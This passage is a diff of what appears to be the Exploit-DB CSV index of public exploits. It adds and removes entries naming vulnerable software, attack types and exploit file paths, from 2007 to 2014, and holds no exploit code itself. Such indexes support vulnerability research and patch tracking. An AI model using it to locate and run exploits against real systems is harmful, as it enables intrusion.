3.1.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 Mail A Friend Open Email Relay Vulnerability",2007-07-24,"Adrian Pastor",php,webapps,0 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 Resname Parameter Cross-Site Scripting Vulnerability",2007-07-24,"Aria-Security Team",php,webapps,0 30381,platforms/windows/remote/30381.txt,"Multiple Browser URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 -30382,platforms/asp/webapps/30382.txt,"W1L3D4 Philboard 0.3 W1L3D4_Aramasonuc.ASP Cross-Site Scripting Vulnerability",2007-07-25,GeFORC3,asp,webapps,0 -30383,platforms/php/webapps/30383.txt,"Vikingboard Viking board 0.1.2 cp.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30384,platforms/php/webapps/30384.txt,"Vikingboard Viking board 0.1.2 user.php u Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30385,platforms/php/webapps/30385.txt,"Vikingboard Viking board 0.1.2 post.php Multiple Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30386,platforms/php/webapps/30386.txt,"Vikingboard Viking board 0.1.2 topic.php s Parameter XSS",2007-07-25,Lostmon,php,webapps,0 -30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 -30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 -30389,platforms/php/webapps/30389.txt,"iFoto 1.0 Index.PHP Directory Traversal Vulnerability",2007-07-25,Lostmon,php,webapps,0 -30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 UserName Parameter SQL Injection Vulnerability",2007-07-26,"Aria-Security Team",php,webapps,0 -30391,platforms/php/webapps/30391.txt,"PhpHostBot 1.05 - Authorize.PHP Remote File Include Vulnerability",2007-07-26,S4M3K,php,webapps,0 -30392,platforms/windows/local/30392.rb,"Microsoft Windows ndproxy.sys - Local Privilege Escalation",2013-12-17,metasploit,windows,local,0 -30393,platforms/win64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Local Privilege Escalation",2013-12-17,metasploit,win64,local,0 -30394,platforms/windows/remote/30394.rb,"Adobe Reader ToolButton - Use After Free",2013-12-17,metasploit,windows,remote,0 +30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - (.M3U) Universal Buffer Overflow (DEP Bypass)",2013-12-16,"Morteza Hashemi",windows,local,0 +30802,platforms/windows/local/30802.c,"VMware Tools 3.1 HGFS.Sys Local Privilege Escalation Vulnerability",2007-11-24,SoBeIt,windows,local,0 +30803,platforms/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 Login SQL Injection Vulnerability",2007-11-24,"Aria-Security Team",php,webapps,0 +30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer 'default.asp' SQL Injection Vulnerability",2007-11-21,"Aria-Security Team",asp,webapps,0 +30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection Vulnerability",2007-11-21,The-0utl4w,asp,webapps,0 +30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,metasploit,linux,remote,443 +30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 +30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box",2013-12-16,"Matt O'Connor",hardware,webapps,0 +30792,platforms/php/webapps/30792.html,"Underground CMS 1.x Search.Cache.Inc.PHP Backdoor Vulnerability",2007-11-21,D4m14n,php,webapps,0 +30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Stored XSS Vulnerability",2013-12-16,"null pointer",php,webapps,0 +30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 +30357,platforms/php/webapps/30357.txt,"iScripts MultiCart <= 2.4 - Persistent XSS / CSRF / XSS+CSRF Mass Accounts takeover",2013-12-16,"Saadi Siddiqui",php,webapps,0 +30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow Vulnerability",2013-12-17,"Arash Allebrahim",windows,local,0 +30361,platforms/hardware/webapps/30361.txt,"Beetel TC1-450 Airtel Wireless Router - Multiple CSRF Vulnerabilities",2013-12-16,"Samandeep Singh",hardware,webapps,0 +30362,platforms/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",hardware,webapps,0 +30791,platforms/multiple/dos/30791.txt,"I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities",2007-11-19,"Luigi Auriemma",multiple,dos,0 +30876,platforms/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,php,webapps,0 +30364,platforms/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection Vulnerabilities",2013-12-16,3spi0n,php,webapps,0 +30365,platforms/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection Vulnerabilities",2013-12-16,3spi0n,php,webapps,0 +30800,platforms/asp/webapps/30800.html,"FooSun Api_Response.ASP SQL Injection Vulnerability",2007-11-23,flyh4t,asp,webapps,0 30395,platforms/php/dos/30395.txt,"PHP openssl_x509_parse() - Memory Corruption Vulnerability",2013-12-17,"Stefan Esser",php,dos,0 30396,platforms/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",php,webapps,80 30397,platforms/windows/dos/30397.txt,"Windows Kernel Win32k.sys - Integer Overflow (MS13-101)",2013-12-17,"Core Security",windows,dos,0 @@ -27255,11 +27302,20 @@ id,file,description,date,author,platform,type,port 30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0 30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0 +30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - (.avi) File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0 30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0 -30413,platforms/windows/dos/30413.py,"PotPlayer 1.5.40688 - (.avi) File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 +31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' - SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0 +31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0 +31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0 +31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 +31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0 +31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 +30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 30414,platforms/windows/dos/30414.py,"GOM Player 2.2.56.5158 - (.avi) File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 -30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 +30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 modules/arcade/index.php gid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30422,platforms/windows/dos/30422.py,"Easy Karaokay Player 3.3.31 - (.wav) Integer Division by Zero",2013-12-22,"Osanda Malith",windows,dos,0 30423,platforms/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 Philboard_Forum.ASP SQL Injection Vulnerability",2007-07-27,Cr@zy_King,asp,webapps,0 30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 Yonetici.ASP SQL Injection Vulnerability",2007-07-28,Yollubunlar,asp,webapps,0 @@ -27296,15 +27352,18 @@ id,file,description,date,author,platform,type,port 30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability",2007-08-07,Hamachiya2,windows,dos,0 30456,platforms/php/webapps/30456.txt,"VietPHP _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30457,platforms/php/webapps/30457.txt,"VietPHP admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30809,platforms/windows/remote/30809.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal Vulnerability",2007-11-26,"Corey Lebleu",windows,remote,0 +30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 Password Parameter SQL Injection Vulnerability",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30462,platforms/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability",2007-08-08,"A.Sawan and nophie",windows,dos,0 30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 YABBSE.INC.PHP Remote File Include Vulnerability",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 +30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 30464,platforms/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) Race Condition Local Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local,0 30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 Index.PHP Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - (.rmp) Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 -30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Path Traversal",2013-12-24,metasploit,linux,remote,443 +30798,platforms/asp/webapps/30798.txt,"NetAuctionHelp 4.1 - Search.ASP SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution",2013-12-24,metasploit,unix,remote,5000 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution",2013-12-24,metasploit,linux,remote,80 30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server - LFI",2013-12-24,metasploit,linux,remote,7071 @@ -27357,6 +27416,7 @@ id,file,description,date,author,platform,type,port 30519,platforms/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow Vulnerability",2007-08-22,"Luigi Auriemma",multiple,dos,0 30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 Pool Index.PHP Cross-Site Scripting Vulnerability",2007-08-13,MustLive,php,webapps,0 30521,platforms/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",multiple,remote,0 +30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow Vulnerability",2007-08-23,"Luigi Auriemma",multiple,remote,0 30524,platforms/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos,0 30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 Index.PHP Remote File Include Vulnerability",2007-08-24,sm0k3,php,webapps,0 @@ -27380,17 +27440,32 @@ id,file,description,date,author,platform,type,port 30543,platforms/linux/remote/30543.txt,"Doomsday Engine 1.8.6/1.9 - Multiple Remote Vulnerabilities",2007-08-29,"Luigi Auriemma",linux,remote,0 30544,platforms/windows/dos/30544.txt,"Yahoo! Messenger 8.1 - File Transfer Denial of Service Vulnerability",2007-08-29,SlicK,windows,dos,0 30545,platforms/asp/webapps/30545.txt,"Absolute Poll Manager XE 4.1 xlaapmview.asp Cross-Site Scripting Vulnerability",2007-08-30,"Richard Brain",asp,webapps,0 -30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0 30547,platforms/hardware/webapps/30547.txt,"D-Link DSL-2750U ME_1.09 - CSRF Vulnerability",2013-12-28,"FIGHTERx war",hardware,webapps,0 +30969,platforms/php/webapps/30969.txt,"MODx 0.9.6.1 - 'AjaxSearch.php' Local File Include Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 +30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 +30971,platforms/linux/remote/30971.txt,"Georgia SoftWorks Secure Shell Server 7.1.3 - Multiple Remote Code Execution Vulnerabilities",2007-01-02,"Luigi Auriemma",linux,remote,0 +30972,platforms/multiple/remote/30972.txt,"Camtasia Studio 4.0.2 - 'csPreloader' Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 30550,platforms/windows/dos/30550.php,"Ofilter Player 1.1 - (.wav) Integer Division by Zero",2013-12-28,"Osanda Malith",windows,dos,0 -30553,platforms/php/webapps/30553.txt,"Toms Gstebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 -30554,platforms/php/webapps/30554.txt,"Toms Gstebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 +31030,platforms/php/webapps/31030.pl,"SpamBam WordPress Plugin Key Calculation Security Bypass Vulnerability",2007-01-15,Romero,php,webapps,0 +30872,platforms/php/webapps/30872.txt,"DomPHP <= 0.83 - SQL Injection Vulnerability",2014-01-13,Houssamix,php,webapps,0 +30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 +30553,platforms/php/webapps/30553.txt,"Toms G",2007-09-07,cod3in,php,webapps,0 +30554,platforms/php/webapps/30554.txt,"Toms G",2007-09-07,cod3in,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0 30556,platforms/php/webapps/30556.html,"Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 30557,platforms/php/webapps/30557.txt,"Claroline 1.x admin/adminusers.php dir Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0 +31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 +31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0 +30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability",2007-11-10,"Tomas Kuliavas",php,webapps,0 +30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 users/register.php URL XSS",2007-11-10,Doz,php,webapps,0 +30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL XSS",2007-11-10,Doz,php,webapps,0 +30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0 +30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 autohtml.php Local File Include Vulnerability",2007-11-10,d3v1l,php,webapps,0 +30882,platforms/hardware/remote/30882.txt,"Thomson SpeedTouch 716 URL Parameter Cross-Site Scripting Vulnerability",2007-11-10,"Remco Verhoef",hardware,remote,0 +30883,platforms/windows/remote/30883.js,"BitDefender Antivirus 2008 bdelev.dll ActiveX Control Double Free Vulnerability",2007-11-11,"Lionel d'Hauenens",windows,remote,0 30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection Vulnerability",2007-09-04,SmOk3,asp,webapps,0 @@ -27409,6 +27484,43 @@ id,file,description,date,author,platform,type,port 30577,platforms/php/webapps/30577.txt,"SWSoft Plesk <= 8.2 - login.php3 PLESKSESSID Cookie SQL Injection",2007-09-12,"Nick I Merritt",php,webapps,0 30578,platforms/linux/dos/30578.txt,"MPlayer 1.0 AVIHeader.C Heap Based Buffer Overflow Vulnerability",2007-09-12,"Code Audit Labs",linux,dos,0 30579,platforms/linux/dos/30579.txt,"Media Player Classic 6.4.9 Malformed AVI Header Multiple Remote Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 +32387,platforms/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-16,"John Cobb",php,webapps,0 +32417,platforms/php/remote/32417.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 +32416,platforms/php/remote/32416.php,"PHP 5.2.6 - 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0 +32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0 +32512,platforms/unix/remote/32512.rb,"FreePBX config.php Remote Code Execution",2014-03-25,metasploit,unix,remote,0 +32413,platforms/php/webapps/32413.txt,"InterTech WCMS 'etemplate.php' SQL Injection Vulnerability",2008-09-23,"GeNiUs IrAQI",php,webapps,0 +32412,platforms/asp/webapps/32412.txt,"Omnicom Content Platform 'browser.asp' Parameter Directory Traversal Vulnerability",2008-09-23,AlbaniaN-[H],asp,webapps,0 +32411,platforms/php/webapps/32411.txt,"Datalife Engine CMS 7.2 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-23,"Hadi Kiamarsi",php,webapps,0 +32410,platforms/php/webapps/32410.txt,"6rbScript 'cat.php' SQL Injection Vulnerability",2008-09-22,"Karar Alshami",php,webapps,0 +32389,platforms/php/webapps/32389.txt,"Quick Cart <= 3.1 - 'admin.php' Cross-Site Scripting Vulnerability",2008-09-17,"John Cobb",php,webapps,0 +32409,platforms/php/webapps/32409.txt,"Achievo 1.3.2 - 'atknodetype' Parameter Cross-Site Scripting Vulnerability",2008-09-20,"Rohit Bansal",php,webapps,0 +32408,platforms/php/webapps/32408.txt,"BlueCUBE CMS 'tienda.php' SQL Injection Vulnerability",2008-09-21,r45c4l,php,webapps,0 +32407,platforms/php/webapps/32407.txt,"BLUEPAGE CMS 2.5 - 'PHPSESSID' Session Fixation Vulnerability",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32406,platforms/php/webapps/32406.txt,"xt:Commerce 3.04 XTCsid Parameter Session Fixation",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32405,platforms/php/webapps/32405.txt,"xt:Commerce 3.04 advanced_search_result.php keywords Parameter XSS",2008-09-22,"David Vieira-Kurz",php,webapps,0 +32404,platforms/php/webapps/32404.html,"fuzzylime (cms) 3.0 - 'usercheck.php' Cross-Site Scripting Vulnerability",2008-09-22,"Fabian Fingerle",php,webapps,0 +32403,platforms/php/webapps/32403.txt,"MapCal 0.1 - 'id' Parameter SQL Injection Vulnerability",2008-09-22,0x90,php,webapps,0 +32402,platforms/php/webapps/32402.txt,"UNAK-CMS Cookie Authentication Bypass Vulnerability",2008-09-22,Ciph3r,php,webapps,0 +32401,platforms/asp/webapps/32401.txt,"rgb72 WCMS 1.0 - 'index.php' SQL Injection Vulnerability",2008-09-22,"CWH Underground",asp,webapps,0 +32400,platforms/multiple/dos/32400.html,"Foxmail Email Client 6.5 - 'mailto' Buffer Overflow Vulnerability",2008-09-22,sebug,multiple,dos,0 +35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0 +32399,platforms/unix/remote/32399.txt,"Multiple Vendor FTP Server Long Command Handling Security Vulnerability",2008-09-20,"Maksymilian Arciemowicz",unix,remote,0 +32398,platforms/php/webapps/32398.txt,"eXtrovert software Thyme 1.3 - 'add_calendars.php' Cross-Site Scripting Vulnerability",2008-09-21,"DigiTrust Group",php,webapps,0 +32397,platforms/php/webapps/32397.txt,"PHP Pro Bid 5.2.4/6.04 - Multiple SQL Injection Vulnerabilities",2008-09-19,"Jan Van Niekerk",php,webapps,0 +32396,platforms/php/webapps/32396.txt,"Parallels H-Sphere 3.0/3.1 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-19,t0fx,php,webapps,0 +32395,platforms/php/webapps/32395.txt,"HyperStop WebHost Directory 1.2 Database Disclosure Vulnerability",2008-09-19,r45c4l,php,webapps,0 +32394,platforms/asp/webapps/32394.txt,"Sama Educational Management System 'Error.asp' Cross-Site Scripting Vulnerability",2008-09-18,Lagon666,asp,webapps,0 +32393,platforms/solaris/remote/32393.txt,"Sun Solaris 9/10 Text Editors - Command Execution Vulnerability",2008-09-17,"Eli the Bearded",solaris,remote,0 +32392,platforms/php/webapps/32392.pl,"Add a link 4 - Security Bypass and SQL Injection Vulnerabilities",2008-09-17,JosS,php,webapps,0 +32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery Vulnerability (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 +33141,platforms/php/remote/33141.rb,"AlienVault OSSIM SQL Injection and Remote Code Execution",2014-05-02,metasploit,php,remote,443 +32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery Vulnerability (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 +31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - (.m3u) Crash PoC",2014-02-26,"Gabor Seljan",windows,dos,0 +32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection Vulnerability",2008-09-17,"Hussin X",php,webapps,0 +32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service Exploit",2014-04-06,"Interference Security",windows,dos,0 +32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (64-bit) - Remote Exploit for Linux (Generic)",2014-03-15,sorbo,linux,remote,0 +33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure Vulnerability",2014-07-07,c1ph04,hardware,webapps,0 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure Vulnerability",2007-09-12,Cr@zy_King,php,webapps,0 30582,platforms/windows/remote/30582.html,"WinSCP <= 4.0.3 URL Protocol Handler Arbitrary File Access Vulnerability",2007-09-13,Kender.Security,windows,remote,0 @@ -27468,6 +27580,7 @@ id,file,description,date,author,platform,type,port 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery Vulnerability",2007-10-04,"David Kierznowski",php,webapps,0 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 Verify.PHP Cross-Site Scripting Vulnerability",2007-10-04,"Jose Sanchez",php,webapps,0 +30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure Vulnerability",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0 30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x GetImage Arbitrary File Download Vulnerability",2007-10-04,"Paul Craig",cgi,webapps,0 30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0 30641,platforms/php/webapps/30641.txt,"AfterLogic MailBee WebMail Pro 3.x login.php mode Parameter XSS",2007-10-05,"Ivan Sanchez",php,webapps,0 @@ -27494,11 +27607,17 @@ id,file,description,date,author,platform,type,port 30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 Content Management System Main.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.PHP Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0 30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0 -30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0 +30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE_ NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0 30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30669,platforms/windows/webapps/30669.txt,"DirectControlTM 3.1.7.0 - Multiple Vulnerabilties",2014-01-03,"mohamad ch",windows,webapps,0 +30865,platforms/php/webapps/30865.txt,"DomPHP <= 0.83 - Local Directory Traversal Vulnerability",2014-01-12,Houssamix,php,webapps,0 +30795,platforms/cgi/webapps/30795.txt,"GWExtranet Multiple Directory Traversal Vulnerabilities",2007-11-21,joseph.giron13,cgi,webapps,0 +30796,platforms/asp/webapps/30796.txt,"E-vanced Solutions E-vents 5.0 - Multiple Input Validation Vulnerabilities",2007-11-21,joseph.giron13,asp,webapps,0 +30797,platforms/windows/dos/30797.html,"Aurigma Image Uploader 4.x - ActiveX Control Multiple Remote Stack Buffer Overflow Vulnerabilities",2007-11-22,"Elazar Broad",windows,dos,0 +31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 - 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 +31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 - 